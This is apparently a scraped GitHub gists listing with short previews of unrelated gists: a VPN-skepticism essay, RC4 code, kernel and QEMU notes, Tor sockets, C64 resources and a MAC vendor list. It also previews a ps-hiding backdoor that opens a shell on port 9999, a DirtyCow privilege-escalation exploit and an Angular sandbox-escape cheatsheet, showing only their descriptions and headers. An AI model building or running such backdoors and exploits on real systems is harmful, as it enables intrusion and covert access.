cedric cedriczirtacic

@joepie91
joepie91 / vpn.md
Last active July 17, 2025 17:03
Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPNs for their intended purpose; that is, as a virtual private (internal) network. It only applies to using them as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
/*
robin verton, dec 2015
implementation of the RC4 algo
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define N 256 // 2^8
@jeremybuis
jeremybuis / angular.sandbox.escapes.md
Created January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
@ncmiller
ncmiller / HOWTO_LinuxKernelQemu.md
Last active July 20, 2025 18:02
How to build the Linux kernel and test changes locally in qemu

This is the process I followed on my Fedora 23 host machine to build a small/minimal vanilla Linux kernel and test in Qemu (based on this blog post). This will provide a safe sandbox in which to test kernel changes, and is generally faster than developing natively on the host machine. Qemu will boot the kernel image directly in the emulated system.

Install required build tools on host machine

sudo dnf install ncurses-devel kernel-devel kernel-headers gcc gcc-c++ git qemu openssl-devel glibc-static

Prepare a working space for kernel development

@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simpler ways to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@KrE80r
KrE80r / c0w.c
Created October 23, 2016 15:19
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@anhldbk
anhldbk / tor-raw.cpp
Created December 6, 2016 02:38
Working with Tor (C/C++)
// g++ -lstdc++ -Wno-write-strings fetch.cpp -o fetch
#ifdef _WIN32 // Windows
#include <winsock2.h>
#include <ws2tcpip.h>
#define MSG_NOSIGNAL 0
#else // Linux + Mac
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
@mubix
mubix / infosec_newbie.md
Last active July 10, 2025 04:30
How to start in Infosec
@jblang
jblang / C64.md
Last active June 1, 2025 07:54
C64 Resources

Emulators

VICE is the best by such a commanding margin that you really needn't look elsewhere. Open source and has the largest community.

However, other options are:

  • CCS64. Lots of features, but I found it to be painfully slow. Shareware.
  • Hoxs64. Decent, but not as full-featured as VICE. The ML monitor seems nice.
  • Frodo is pretty outdated and the author admits as much.
  • micro64 seems promising but incomplete.
@aallan
aallan / mac-vendor.txt
Last active July 17, 2025 21:46
List of MAC addresses with vendors identities
000000 Officially Xerox
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000003 XEROX CORPORATION
000004 XEROX CORPORATION
000005 XEROX CORPORATION
000006 XEROX CORPORATION
000007 XEROX CORPORATION
000008 XEROX CORPORATION
000009 powerpipes?